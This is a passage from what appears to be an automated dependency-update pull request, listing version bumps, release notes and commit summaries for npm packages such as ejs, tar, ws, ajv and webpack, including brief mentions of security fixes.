href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c\"\u003ef4af31c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003e\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/d35c865b877d2f9ded7c1ed87521c2fdb689c8dd\"\u003e\u003ccode\u003ed35c865\u003c/code\u003e\u003c/a\u003e chore(release): 6.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5a37e19173a759782e3f716b04c8df90a02daec8\"\u003e\u003ccode\u003e5a37e19\u003c/code\u003e\u003c/a\u003e chore: update package.json and package.lock\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef78340f0a4523a90276306b2f45fc6859a\"\u003e\u003ccode\u003eba5aaef\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c8ee70e1830450755eceac775876b391b9\"\u003e\u003ccode\u003ef4af31c\u003c/code\u003e\u003c/a\u003e fix(core): support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ejs` from 3.1.9 to 3.1.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/releases\"\u003eejs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.10\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.10\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/d3f807dea9ce904e20a47a661f2310ce9134dc2a\"\u003e\u003ccode\u003ed3f807d\u003c/code\u003e\u003c/a\u003e Version 3.1.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/9ee26dde5d7015d9c0e2ff87314cabeac5247c02\"\u003e\u003ccode\u003e9ee26dd\u003c/code\u003e\u003c/a\u003e Mocha TDD\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/e469741dca7df2eb400199e1cdb74621e3f89aa5\"\u003e\u003ccode\u003ee469741\u003c/code\u003e\u003c/a\u003e Basic pollution protection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/715e9507fa3e6122dc6430fe0f25a6e6ded300c1\"\u003e\u003ccode\u003e715e950\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mde/ejs/issues/756\"\u003e#756\u003c/a\u003e from Jeffrey-mu/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/cabe3146ad964a1e98db7742abf435906ca79406\"\u003e\u003ccode\u003ecabe314\u003c/code\u003e\u003c/a\u003e Include advanced usage examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/29b076cdbbf3eb1b4323b33299ab6d79391b2c33\"\u003e\u003ccode\u003e29b076c\u003c/code\u003e\u003c/a\u003e Added header\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/11503c79af882e3635b513d57c7f1813792eb127\"\u003e\u003ccode\u003e11503c7\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:mde/ejs into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/7690404e2fc1688756938e4d2fc19e0fac77d736\"\u003e\u003ccode\u003e7690404\u003c/code\u003e\u003c/a\u003e Added security banner to README\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/f47d7aedd51a983e4f73045f962b1209096b5800\"\u003e\u003ccode\u003ef47d7ae\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/828cea1687e3db459ab09d2f405d2444c7580b90\"\u003e\u003ccode\u003e828cea1\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mde/ejs/compare/v3.1.9...v3.1.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.6 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.6...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yauzl` from 3.2.0 to 3.2.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/c4695215b05c6adffda613b9051a2a85429b33fe\"\u003e\u003ccode\u003ec469521\u003c/code\u003e\u003c/a\u003e version 3.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/00c561b8cf1ff92e076f7087ac6287e510d4af54\"\u003e\u003ccode\u003e00c561b\u003c/code\u003e\u003c/a\u003e fix bounds checking logic on NtfsTimestamp\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/277b294d23fc1c10ff772fa5e858830ca79d9892\"\u003e\u003ccode\u003e277b294\u003c/code\u003e\u003c/a\u003e comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/de292f220268473eb20aef64b0a77faa9d004d9a\"\u003e\u003ccode\u003ede292f2\u003c/code\u003e\u003c/a\u003e streamed zip file test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/e00f13978fe284d60199014f567fb9efc4df8499\"\u003e\u003ccode\u003ee00f139\u003c/code\u003e\u003c/a\u003e truncate long test file names for eCryptfs compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/d98e05247dc7b95f5f0bcd336a81aca6d8563b95\"\u003e\u003ccode\u003ed98e052\u003c/code\u003e\u003c/a\u003e fix name of Info-ZIP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/a8951a29884b9506b695575037bee608b09592cc\"\u003e\u003ccode\u003ea8951a2\u003c/code\u003e\u003c/a\u003e update readme\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/thejoshwolfe/yauzl/compare/3.2.0...3.2.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.4.5 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.4.3 to 7.5.12\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 7.5.8 to 7.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e7.5.10\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported e55e5106 to the 7.x release line (22c28763).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.5.9\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported bc8bd34e to the 7.x release line (0435e6e1).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/d962d70649e393841ee1ed726a8f7ffbe90d0c06\"\u003e\u003ccode\u003ed962d70\u003c/code\u003e\u003c/a\u003e [dist] 7.5.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f\"\u003e\u003ccode\u003e22c2876\u003c/code\u003e\u003c/a\u003e [security] Fix crash when the Upgrade header cannot be read (\u003ca href=\"https://redirect.github.com/websockets/ws/issues/2231\"\u003e#2231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/8a78f8770618cc5a1ade485a7445cb6d6f46e2f2\"\u003e\u003ccode\u003e8a78f87\u003c/code\u003e\u003c/a\u003e [dist] 7.5.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/0435e6e12b8d38992cf0651cb8605dde2294bd25\"\u003e\u003ccode\u003e0435e6e\u003c/code\u003e\u003c/a\u003e [security] Fix same host check for ws+unix: redirects\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/websockets/ws/compare/7.5.8...7.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.91.0 to 5.105.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level \u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 